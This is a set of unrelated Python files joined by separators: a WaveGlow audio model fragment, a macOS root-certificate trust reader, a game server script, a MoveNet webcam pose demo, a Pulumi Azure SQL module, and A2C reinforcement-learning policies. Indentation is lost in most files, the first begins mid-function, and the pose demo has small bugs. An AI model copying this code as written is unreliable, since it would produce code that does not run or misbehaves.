spect = spect.unfold(2, self.n_group, self.n_group).permute(0, 2, 1, 3)
spect = spect.contiguous().view(spect.size(0), spect.size(1), -1).permute(0, 2, 1)
audio = audio.unfold(1, self.n_group, self.n_group).permute(0, 2, 1)
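        # Illustrative shapes after grouping (assuming n_group=8): audio [B, T] -> [B, 8, T//8]
        # and spect [B, n_mel, T] -> [B, n_mel*8, T//8], so each group of 8 audio samples is
        # conditioned on the corresponding stack of upsampled mel frames.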
output_audio = []
log_s_list = []
log_det_W_list = []
for k in range(self.n_flows):
if k % self.n_early_every == 0 and k > 0:
output_audio.append(audio[:,:self.n_early_size,:])
audio = audio[:,self.n_early_size:,:]
audio, log_det_W = self.convinv[k](audio)
log_det_W_list.append(log_det_W)
n_half = int(audio.size(1)/2)
audio_0 = audio[:,:n_half,:]
audio_1 = audio[:,n_half:,:]
output = self.WN[k]((audio_0, spect))
log_s = output[:, n_half:, :]
b = output[:, :n_half, :]
audio_1 = torch.exp(log_s)*audio_1 + b
log_s_list.append(log_s)
audio = torch.cat([audio_0, audio_1],1)
output_audio.append(audio)
return torch.cat(output_audio,1), log_s_list, log_det_W_list
def infer(self, spect, sigma=1.0):
spect = self.upsampling(spect)
# trim conv artifacts. maybe pad spec to kernel multiple
time_cutoff = self.upsampling.kernel_size[0] - 2 * self.upsampling.stride[0]
spect = spect[:, :, :-time_cutoff]
spect = spect.unfold(2, self.n_group, self.n_group).permute(0, 2, 1, 3)
spect = spect.contiguous().view(spect.size(0), spect.size(1), -1).permute(0, 2, 1)
if spect.type() == 'torch.cuda.HalfTensor':
audio = torch.cuda.HalfTensor(spect.size(0),
self.n_remaining_channels,
spect.size(2)).normal_()
else:
audio = torch.cuda.FloatTensor(spect.size(0),
self.n_remaining_channels,
spect.size(2)).normal_()
audio = torch.autograd.Variable(sigma*audio)
for k in reversed(range(self.n_flows)):
n_half = int(audio.size(1)/2)
audio_0 = audio[:,:n_half,:]
audio_1 = audio[:,n_half:,:]
output = self.WN[k]((audio_0, spect))
s = output[:, n_half:, :]
b = output[:, :n_half, :]
audio_1 = (audio_1 - b)/torch.exp(s)
audio = torch.cat([audio_0, audio_1],1)
audio = self.convinv[k](audio, reverse=True)
if k % self.n_early_every == 0 and k > 0:
if spect.type() == 'torch.cuda.HalfTensor':
z = torch.cuda.HalfTensor(spect.size(0), self.n_early_size, spect.size(2)).normal_()
else:
z = torch.cuda.FloatTensor(spect.size(0), self.n_early_size, spect.size(2)).normal_()
audio = torch.cat((sigma*z, audio),1)
audio = audio.permute(0,2,1).contiguous().view(audio.size(0), -1).data
return audio
@staticmethod
def remove_weightnorm(model):
waveglow = model
for WN in waveglow.WN:
WN.start = torch.nn.utils.remove_weight_norm(WN.start)
WN.in_layers = remove(WN.in_layers)
WN.cond_layer = torch.nn.utils.remove_weight_norm(WN.cond_layer)
WN.res_skip_layers = remove(WN.res_skip_layers)
return waveglow
def remove(conv_list):
new_conv_list = torch.nn.ModuleList()
for old_conv in conv_list:
old_conv = torch.nn.utils.remove_weight_norm(old_conv)
new_conv_list.append(old_conv)
return new_conv_list
|
# coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
import hashlib
import sys
from .._ffi import new, unwrap
from ._core_foundation import CoreFoundation, CFHelpers
from ._security import Security, SecurityConst, handle_sec_error
if sys.version_info < (3,):
range = xrange # noqa
__all__ = [
'extract_from_system',
'system_path',
]
def system_path():
return None
def extract_from_system():
"""
Extracts trusted CA certificates from the OS X trusted root keychain.
:raises:
OSError - when an error is returned by the OS crypto library
:return:
A list of 3-element tuples:
- 0: a byte string of a DER-encoded certificate
- 1: a set of unicode strings that are OIDs of purposes to trust the
certificate for
- 2: a set of unicode strings that are OIDs of purposes to reject the
certificate for
"""
certs_pointer_pointer = new(CoreFoundation, 'CFArrayRef *')
res = Security.SecTrustCopyAnchorCertificates(certs_pointer_pointer)
handle_sec_error(res)
certs_pointer = unwrap(certs_pointer_pointer)
certificates = {}
trust_info = {}
all_purposes = '2.5.29.37.0'
default_trust = (set(), set())
length = CoreFoundation.CFArrayGetCount(certs_pointer)
for index in range(0, length):
cert_pointer = CoreFoundation.CFArrayGetValueAtIndex(certs_pointer, index)
der_cert, cert_hash = _cert_details(cert_pointer)
certificates[cert_hash] = der_cert
CoreFoundation.CFRelease(certs_pointer)
for domain in [SecurityConst.kSecTrustSettingsDomainUser, SecurityConst.kSecTrustSettingsDomainAdmin]:
cert_trust_settings_pointer_pointer = new(CoreFoundation, 'CFArrayRef *')
res = Security.SecTrustSettingsCopyCertificates(domain, cert_trust_settings_pointer_pointer)
if res == SecurityConst.errSecNoTrustSettings:
continue
handle_sec_error(res)
cert_trust_settings_pointer = unwrap(cert_trust_settings_pointer_pointer)
length = CoreFoundation.CFArrayGetCount(cert_trust_settings_pointer)
for index in range(0, length):
cert_pointer = CoreFoundation.CFArrayGetValueAtIndex(cert_trust_settings_pointer, index)
trust_settings_pointer_pointer = new(CoreFoundation, 'CFArrayRef *')
res = Security.SecTrustSettingsCopyTrustSettings(cert_pointer, domain, trust_settings_pointer_pointer)
# In OS X 10.11, this value started being seen. From the comments in
# the Security Framework Reference, the lack of any settings should
# indicate "always trust this certificate"
if res == SecurityConst.errSecItemNotFound:
continue
# If the trust settings for a certificate are invalid, we need to
# assume the certificate should not be trusted
if res == SecurityConst.errSecInvalidTrustSettings:
der_cert, cert_hash = _cert_details(cert_pointer)
if cert_hash in certificates:
del certificates[cert_hash]
continue
handle_sec_error(res)
trust_settings_pointer = unwrap(trust_settings_pointer_pointer)
trust_oids = set()
reject_oids = set()
settings_length = CoreFoundation.CFArrayGetCount(trust_settings_pointer)
for settings_index in range(0, settings_length):
settings_dict_entry = CoreFoundation.CFArrayGetValueAtIndex(trust_settings_pointer, settings_index)
settings_dict = CFHelpers.cf_dictionary_to_dict(settings_dict_entry)
# No policy OID means the trust result is for all purposes
policy_oid = settings_dict.get('kSecTrustSettingsPolicy', {}).get('SecPolicyOid', all_purposes)
# 0 = kSecTrustSettingsResultInvalid
# 1 = kSecTrustSettingsResultTrustRoot
# 2 = kSecTrustSettingsResultTrustAsRoot
# 3 = kSecTrustSettingsResultDeny
# 4 = kSecTrustSettingsResultUnspecified
trust_result = settings_dict.get('kSecTrustSettingsResult', 1)
should_trust = trust_result != 0 and trust_result != 3
if should_trust:
trust_oids.add(policy_oid)
else:
reject_oids.add(policy_oid)
der_cert, cert_hash = _cert_details(cert_pointer)
# If rejected for all purposes, we don't export the certificate
if all_purposes in reject_oids:
if cert_hash in certificates:
del certificates[cert_hash]
else:
if all_purposes in trust_oids:
trust_oids = set([all_purposes])
trust_info[cert_hash] = (trust_oids, reject_oids)
CoreFoundation.CFRelease(trust_settings_pointer)
CoreFoundation.CFRelease(cert_trust_settings_pointer)
output = []
for cert_hash in certificates:
cert_trust_info = trust_info.get(cert_hash, default_trust)
output.append((certificates[cert_hash], cert_trust_info[0], cert_trust_info[1]))
return output
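# Illustrative usage (a sketch; only meaningful on an OS X / macOS system):
#   for der_cert, trust_oids, reject_oids in extract_from_system():
#       # der_cert is the DER-encoded certificate; the OID sets list purposes the certificate
#       # is explicitly trusted or rejected for (empty sets mean default trust)
#       pass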
def _cert_details(cert_pointer):
"""
Return the certificate and a hash of it
:param cert_pointer:
A SecCertificateRef
:return:
A 2-element tuple:
         - [0]: A byte string of the DER-encoded contents of the cert
         - [1]: A byte string of the SHA1 hash of the cert
"""
data_pointer = None
try:
data_pointer = Security.SecCertificateCopyData(cert_pointer)
der_cert = CFHelpers.cf_data_to_bytes(data_pointer)
cert_hash = hashlib.sha1(der_cert).digest()
return (der_cert, cert_hash)
finally:
if data_pointer is not None:
CoreFoundation.CFRelease(data_pointer)
|
# Used in Party Quest - Escape
if sm.hasMobsInField():
sm.warp(921160400, 0) # A secret Door to the Aerial Prison
else:
sm.chat("Please eliminate all mobs.")
sm.dispose()
|
"""The purpose of this script is to compare the performance and
accuracy of possible object detection models for real time inference
in a normal computer cpu. We are going to compare several models
selected from the object detection collection of TF hub
(https://tfhub.dev/tensorflow/collections/object_detection/1)
"""
import os
import sys
dir_path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.dirname(dir_path))
import cv2 as cv
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub
from utils import (
convert_saved_model_tflite,
download_model_tf_hub,
getFPS,
load_tflite_model,
predict_tflite_model,
draw_text_top_left_height,
draw_skel_and_kp,
unprocess_keypoint_coords,
)
# load tflite model (press 'l' to switch)
tflite = False
# Selecting our camera
device = 0
cam = cv.VideoCapture(device)
# Setting the capture resolution we expect (width=1280, height=720)
cam.set(3, 1280)
cam.set(4, 720)
# Creating window to display
cv.namedWindow("Object Detection", cv.WINDOW_NORMAL)
# Setting FPS buffer
BUFFER_SIZE = 100
times = np.zeros(BUFFER_SIZE)
model_idx = 0
models = [
    # Load this model by pressing number 1 on your keyboard (loaded by default)
{
"name": "singlepose-lightning",
"model_path": "movenet_singlepose_lightning_4",
"hub_path": "https://tfhub.dev/google/movenet/singlepose/lightning/4",
"input_shape": (192, 192),
"threshold": 0.5,
},
    # Load this model by pressing number 2 on your keyboard
{
"name": "singlepose-thunder",
"model_path": "movenet_singlepose_thunder_4",
"hub_path": "https://tfhub.dev/google/movenet/singlepose/thunder/4",
"input_shape": (256, 256),
"threshold": 0.5,
},
    # Load this model by pressing number 3 on your keyboard
{
"name": "multipose-lightning",
"model_path": "movenet_multipose_lightning_4",
"hub_path": "https://tfhub.dev/google/movenet/multipose/lightning/1",
"input_shape": (256, 256),
"threshold": 0.5,
},
]
load_model = True
while True:
if load_model:
# restarting buffer for fps
times = np.zeros(BUFFER_SIZE)
# initializing models variables
input_shape = models[model_idx]["input_shape"]
saved_model_path = os.path.join(
dir_path, "models", models[model_idx]["model_path"]
)
if not tflite:
print("Loading saved_model...")
            # if the model was already downloaded, load it locally; otherwise fetch it from TF Hub
if not os.path.isdir(saved_model_path):
model = download_model_tf_hub(models[model_idx], dir_path=dir_path)
else:
model = tf.saved_model.load(saved_model_path)
movenet = model.signatures["serving_default"]
else:
print("Loading tflite model...")
tflite_model_path = f"{saved_model_path}.tflite"
# if tflite model is not created we need to create it
if not os.path.isfile(tflite_model_path):
# if saved model is not downloaded from tf hub we need to do so
if not os.path.isdir(saved_model_path):
download_model_tf_hub(
models[model_idx],
dir_path=dir_path,
return_model=False,
)
# converting model to tflite
convert_saved_model_tflite(saved_model_path)
# loading tflite model
tflite_model = load_tflite_model(tflite_model_path)
# Turn off flag to load a new model
load_model = False
print("Model loaded and ready for inference! Let's go!")
ret, image = cam.read()
if ret:
# preprocessing image
inference_image = tf.expand_dims(image, axis=0)
inference_image = tf.cast(
tf.image.resize(inference_image, input_shape), dtype=tf.int32
)
# inference
if not tflite:
output = movenet(inference_image)
else:
output = predict_tflite_model(tflite_model, inference_image)
# unprocessing output
output = tf.squeeze(output["output_0"], axis=0).numpy()
instance_scores = np.ones(len(output))
keypoint_scores = output[:, :, 2]
keypoint_coords = output[:, :, :2]
keypoint_coords = unprocess_keypoint_coords(
keypoint_coords, image.shape[:2], input_shape
)
# plotting results in image
image = draw_skel_and_kp(
image,
instance_scores=instance_scores,
keypoint_scores=keypoint_scores,
keypoint_coords=keypoint_coords,
min_pose_score=0.5,
min_part_score=0.5,
)
# Getting and printing FPS
fps = getFPS(times)
draw_text_top_left_height(image, f"FPS: {fps:.2f}")
# Showing image
cv.imshow("Object Detection", image)
key = cv.waitKey(1)
# Press esc to stop the execution
if key == 27:
break
elif key == ord("1"):
if model_idx != 0:
model_idx = 0
load_model = True
elif key == ord("2"):
if model_idx != 1:
model_idx = 1
load_model = True
elif key == ord("3"):
if model_idx != 2:
model_idx = 2
load_model = True
elif key == ord("5"):
if model_idx != 2:
model_idx = 4
load_model = True
elif key == ord("l"):
tflite = not tflite
load_model = True
elif key == ord("s"):
non_max = not non_max
cv.destroyAllWindows()
cam.release()
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Export this package's modules as members:
from ._enums import *
from .database import *
from .database_vulnerability_assessment import *
from .database_vulnerability_assessment_rule_baseline import *
from .get_database import *
from .get_database_vulnerability_assessment import *
from .get_database_vulnerability_assessment_rule_baseline import *
from .get_job import *
from .get_job_agent import *
from .get_job_credential import *
from .get_job_step import *
from .get_job_target_group import *
from .get_managed_database import *
from .get_managed_instance_administrator import *
from .get_sensitivity_label import *
from .get_server_dns_alias import *
from .job import *
from .job_agent import *
from .job_credential import *
from .job_step import *
from .job_target_group import *
from .managed_database import *
from .managed_instance_administrator import *
from .sensitivity_label import *
from .server_dns_alias import *
from ._inputs import *
from . import outputs
def _register_module():
import pulumi
from ... import _utilities
class Module(pulumi.runtime.ResourceModule):
_version = _utilities.get_semver_version()
def version(self):
return Module._version
def construct(self, name: str, typ: str, urn: str) -> pulumi.Resource:
if typ == "azure-native:sql/v20170301preview:Database":
return Database(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:DatabaseVulnerabilityAssessment":
return DatabaseVulnerabilityAssessment(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:DatabaseVulnerabilityAssessmentRuleBaseline":
return DatabaseVulnerabilityAssessmentRuleBaseline(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:Job":
return Job(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:JobAgent":
return JobAgent(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:JobCredential":
return JobCredential(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:JobStep":
return JobStep(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:JobTargetGroup":
return JobTargetGroup(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:ManagedDatabase":
return ManagedDatabase(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:ManagedInstanceAdministrator":
return ManagedInstanceAdministrator(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:SensitivityLabel":
return SensitivityLabel(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:ServerDnsAlias":
return ServerDnsAlias(name, pulumi.ResourceOptions(urn=urn))
else:
raise Exception(f"unknown resource type {typ}")
_module_instance = Module()
pulumi.runtime.register_resource_module("azure-native", "sql/v20170301preview", _module_instance)
_register_module()
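# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of this generated module, kept commented out
# so importing the module stays side-effect free): how the versioned sql
# module above is typically consumed from a Pulumi program. The resource
# group, server name and location are placeholders, not values from this file.
#
# import pulumi
# import pulumi_azure_native as azure_native
#
# db = azure_native.sql.v20170301preview.Database(
#     "exampleDatabase",
#     resource_group_name="example-rg",      # assumed pre-existing resource group
#     server_name="example-sqlserver",       # assumed pre-existing SQL server
#     location="westus2",
# )
# pulumi.export("databaseName", db.name)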
|
import numpy as np
import tensorflow as tf
from baselines.a2c.utils import conv, fc, conv_to_fc, batch_to_seq, seq_to_batch, lstm, lnlstm, sample, check_shape
from baselines.common.distributions import make_pdtype
import baselines.common.tf_util as U
import gym
class LnLstmPolicy(object):
def __init__(self, sess, ob_space, ac_space, nenv, nsteps, nstack, nlstm=256, reuse=False):
nbatch = nenv*nsteps
nh, nw, nc = ob_space.shape
ob_shape = (nbatch, nh, nw, nc*nstack)
nact = ac_space.n
X = tf.placeholder(tf.uint8, ob_shape) #obs
M = tf.placeholder(tf.float32, [nbatch]) #mask (done t-1)
S = tf.placeholder(tf.float32, [nenv, nlstm*2]) #states
with tf.variable_scope("model", reuse=reuse):
h = conv(tf.cast(X, tf.float32)/255., 'c1', nf=32, rf=8, stride=4, init_scale=np.sqrt(2))
h2 = conv(h, 'c2', nf=64, rf=4, stride=2, init_scale=np.sqrt(2))
h3 = conv(h2, 'c3', nf=64, rf=3, stride=1, init_scale=np.sqrt(2))
h3 = conv_to_fc(h3)
h4 = fc(h3, 'fc1', nh=512, init_scale=np.sqrt(2))
xs = batch_to_seq(h4, nenv, nsteps) # Comments by Fei: xs is list of nsteps, each is nenv * nh
ms = batch_to_seq(M, nenv, nsteps) # Comments by Fei: ms is list of nsteps, each is nenv vector
h5, snew = lnlstm(xs, ms, S, 'lstm1', nh=nlstm) # Comment by Fei: h5 is the same dimension as xs, but with value changed by LSTM. snew is new S
h5 = seq_to_batch(h5) # Comments by Fei: h5 is nbatch * nh again, just like h4
pi = fc(h5, 'pi', nact, act=lambda x:x) # Comments by Fei: pi is nbatch * nact
vf = fc(h5, 'v', 1, act=lambda x:x) # Comments by Fei: vf is nbatch * 1
v0 = vf[:, 0] # Comments by Fei: v0 is nbatch vector, each value is the value function of a state
a0 = sample(pi) # Comments by Fei: a0 is an nbatch vector; each value is an action sampled from the policy at that state
self.initial_state = np.zeros((nenv, nlstm*2), dtype=np.float32)
def step(ob, state, mask):
a, v, s = sess.run([a0, v0, snew], {X:ob, S:state, M:mask})
return a, v, s
def value(ob, state, mask):
return sess.run(v0, {X:ob, S:state, M:mask})
self.X = X
self.M = M
self.S = S
self.pi = pi
self.vf = vf
self.step = step
self.value = value
class LstmPolicy(object):
def __init__(self, sess, ob_space, ac_space, nenv, nsteps, nstack, nlstm=256, reuse=False):
nbatch = nenv*nsteps
nh, nw, nc = ob_space.shape
ob_shape = (nbatch, nh, nw, nc*nstack)
nact = ac_space.n
X = tf.placeholder(tf.uint8, ob_shape) #obs
M = tf.placeholder(tf.float32, [nbatch]) #mask (done t-1)
S = tf.placeholder(tf.float32, [nenv, nlstm*2]) #states
with tf.variable_scope("model", reuse=reuse):
h = conv(tf.cast(X, tf.float32)/255., 'c1', nf=32, rf=8, stride=4, init_scale=np.sqrt(2))
h2 = conv(h, 'c2', nf=64, rf=4, stride=2, init_scale=np.sqrt(2))
h3 = conv(h2, 'c3', nf=64, rf=3, stride=1, init_scale=np.sqrt(2))
h3 = conv_to_fc(h3)
h4 = fc(h3, 'fc1', nh=512, init_scale=np.sqrt(2))
xs = batch_to_seq(h4, nenv, nsteps)
ms = batch_to_seq(M, nenv, nsteps)
h5, snew = lstm(xs, ms, S, 'lstm1', nh=nlstm)
h5 = seq_to_batch(h5)
pi = fc(h5, 'pi', nact, act=lambda x:x)
vf = fc(h5, 'v', 1, act=lambda x:x)
v0 = vf[:, 0]
a0 = sample(pi)
self.initial_state = np.zeros((nenv, nlstm*2), dtype=np.float32)
def step(ob, state, mask):
a, v, s = sess.run([a0, v0, snew], {X:ob, S:state, M:mask})
return a, v, s
def value(ob, state, mask):
return sess.run(v0, {X:ob, S:state, M:mask})
self.X = X
self.M = M
self.S = S
self.pi = pi
self.vf = vf
self.step = step
self.value = value
class CnnPolicy(object):
def __init__(self, sess, ob_space, ac_space, nenv, nsteps, nstack, reuse=False):
nbatch = nenv*nsteps
nh, nw, nc = ob_space.shape
ob_shape = (nbatch, nh, nw, nc*nstack)
nact = ac_space.n
X = tf.placeholder(tf.int8, ob_shape) #obs Change for SAT: SAT input is of type int8!
with tf.variable_scope("model", reuse=reuse):
h = conv(tf.cast(X, tf.float32), 'c1', nf=32, rf=8, stride=1, init_scale=np.sqrt(2)) # Change for SAT, don't divide input by 255.
# h = conv(tf.cast(X, tf.float32)/255., 'c1', nf=32, rf=8, stride=4, init_scale=np.sqrt(2)) # Change for SAT, don't divide input by 255.
h2 = conv(h, 'c2', nf=64, rf=4, stride=2, init_scale=np.sqrt(2))
h3 = conv(h2, 'c3', nf=64, rf=3, stride=1, init_scale=np.sqrt(2))
h3 = conv_to_fc(h3)
h4 = fc(h3, 'fc1', nh=512, init_scale=np.sqrt(2))
pi = fc(h4, 'pi', nact, act=lambda x:x)
vf = fc(h4, 'v', 1, act=lambda x:x)
v0 = vf[:, 0]
a0 = sample(pi)
self.initial_state = [] #not stateful
def step(ob, *_args, **_kwargs):
a, v = sess.run([a0, v0], {X:ob})
return a, v, [] #dummy state
def value(ob, *_args, **_kwargs):
return sess.run(v0, {X:ob})
self.X = X
self.pi = pi
self.vf = vf
self.step = step
self.value = value
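# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original file): how an A2C runner
# typically instantiates one of the policies above and queries it for actions
# and values. Assumes TF 1.x and the baselines utilities imported at the top;
# the env id, hyper-parameters and int8 observation dtype are placeholders
# matching the SAT-modified CnnPolicy, not the original training setup.
def _policy_usage_sketch():
    env = gym.make("BreakoutNoFrameskip-v4")
    nenv, nsteps, nstack = 1, 1, 4
    sess = tf.Session()
    # A2C builds the same class twice: nsteps=1 for acting (step model) and
    # the full rollout length for training (train model); one copy suffices here.
    policy = CnnPolicy(sess, env.observation_space, env.action_space,
                       nenv, nsteps, nstack, reuse=False)
    sess.run(tf.global_variables_initializer())
    nh, nw, nc = env.observation_space.shape
    obs = np.zeros((nenv * nsteps, nh, nw, nc * nstack), dtype=np.int8)
    actions, values, _ = policy.step(obs)
    return actions, values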
|